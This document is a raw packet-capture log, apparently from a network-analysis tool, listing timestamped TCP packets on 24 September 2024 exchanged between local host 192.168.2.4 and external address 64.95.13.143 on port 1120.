Sep 24, 2024 17:46:12.220602989 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.220629930 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.220653057 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.220849037 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.220858097 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.220905066 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.221112013 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.221120119 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.221124887 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.221132040 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.221144915 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.221153021 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.221163988 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.221174002 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.221180916 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.221193075 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.221201897 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.221209049 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.221220970 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.221230984 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.221247911 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.222074986 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.222080946 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.222094059 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.222100019 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.222105980 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.222111940 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.222121954 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.222132921 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.222141027 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.222150087 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.222188950 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.222198009 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.222208023 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.222227097 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.222244978 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.223047972 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.223056078 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.223067999 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.223074913 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.223083019 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.223095894 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.223102093 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.223112106 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.223121881 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.223124027 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.223134041 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.223144054 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.223150015 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.223156929 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.223165989 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.223187923 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.223851919 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.223906994 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.224008083 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.224014997 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.224028111 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.224034071 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.224045992 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.224051952 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.224060059 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.224071980 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.224077940 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.224092007 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.224097967 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.224104881 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.224124908 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.224153996 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.225028992 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.225035906 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.225048065 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.225054026 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.225060940 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.225075006 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.225081921 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.225089073 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.225095987 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.225107908 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.225116014 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.225122929 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.225131035 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.225136042 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.225146055 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.225167036 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.225188971 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.225707054 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.225723028 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.225733995 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.225739956 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.225747108 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.225753069 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.225765944 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.225771904 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.225781918 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.225789070 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.225801945 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.225807905 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.225825071 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.225857019 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.226274014 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.226284027 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.226303101 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.226315022 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.226321936 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.226336002 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.226341963 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.226356030 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.226361036 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.226371050 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.226386070 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.226404905 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.226727962 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.226733923 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.226747990 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.226753950 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.226759911 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.226777077 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.226779938 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.226790905 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.226800919 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.226809978 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.226830006 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.226851940 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.284970999 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.284986973 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.285001040 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.285007000 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.285013914 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.285021067 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.285034895 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.285106897 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.285140991 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.309581995 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.309595108 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.309609890 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.309689045 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.309696913 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.309703112 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.309722900 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.309731960 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.309741020 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.309789896 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.312664032 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.312694073 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.312695980 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.312702894 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.312711954 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.312720060 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.312736034 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.312748909 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.312783003 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.312911034 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.312917948 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.312931061 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.312938929 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.312946081 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.312957048 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.312984943 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.313215017 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.313221931 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.313258886 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.313282013 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.313290119 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.313294888 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.313302040 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.313308954 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.313322067 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.313332081 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.313338995 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.313348055 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.313359976 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.313374996 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.313394070 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.313949108 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.313955069 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.313967943 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.313973904 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.313982010 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.313997984 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.313999891 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.314030886 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.314058065 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.314471006 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.314483881 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.314490080 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.314496994 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.314512968 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.314517975 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.314532995 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.314546108 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.314552069 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.314562082 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.314573050 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.314574957 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.314584970 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.314598083 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.314605951 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.314615011 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.314624071 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.314656973 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.315366030 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.315373898 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.315397978 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.315403938 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.315418959 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.315422058 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.315433025 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.315438986 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.315448046 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.315454960 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.315464973 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.315474987 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.315483093 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.315494061 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.315504074 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.315511942 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.315521002 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.315531969 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.315551996 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.316265106 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.316277981 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.316283941 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.316293955 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.316304922 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.316307068 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.316318035 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.316323996 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.316329956 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.316344976 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.316355944 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.316361904 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.316370010 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.316387892 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.316390038 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.316401005 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.316407919 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.316425085 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.317020893 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.317033052 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.317039967 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.317045927 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.317063093 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.317071915 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.317080021 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.317080021 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.317090034 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.317097902 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.317111015 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.317117929 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.317127943 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.317137003 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.317147017 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.317156076 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.317164898 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.317176104 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.317184925 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.317195892 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.317220926 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.317630053 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.317635059 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.317646027 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.317651987 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.317677975 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.317688942 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.317882061 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.317898989 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.317912102 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.317918062 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.317931890 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.317939997 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.317950964 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.317960978 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.317970991 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.317998886 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.318279982 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.318286896 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.318299055 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.318305969 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.318314075 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.318327904 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.318339109 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.318346024 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.318355083 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.319436073 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.378175020 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.378206968 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.378213882 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.378218889 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.378226995 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.378232002 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.378246069 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.378276110 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.378355026 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.402261972 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.402275085 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.402295113 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.402302980 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.402314901 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.402323008 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.402331114 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.402395964 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.402442932 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.403436899 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.405085087 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.405092001 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.405105114 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.405164003 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.405230999 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.405237913 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.405250072 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.405258894 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.405281067 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.405308008 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.405468941 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.405476093 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.405487061 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.405493021 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.405515909 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.405564070 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.405867100 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.405874014 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.405885935 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.405894041 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.405905008 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.405919075 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.405950069 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.406131029 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.406135082 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.406147003 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.406153917 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.406161070 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.406172991 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.406178951 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.406188965 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.406199932 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.406209946 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.406218052 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.406233072 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.406244040 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.406250954 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.406260014 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.406269073 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.406322002 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.406929016 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.406935930 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.406949043 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.406955957 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.406970978 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.406981945 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.406992912 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.407002926 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.407007933 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.407021999 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.407035112 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.407037973 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.407058001 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.407073975 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.407083988 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.407099009 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.407525063 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.407530069 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.407541990 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.407547951 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.407557011 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.407568932 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.407579899 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.407582045 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.407625914 CEST497301120192.168.2.464.95.13.143
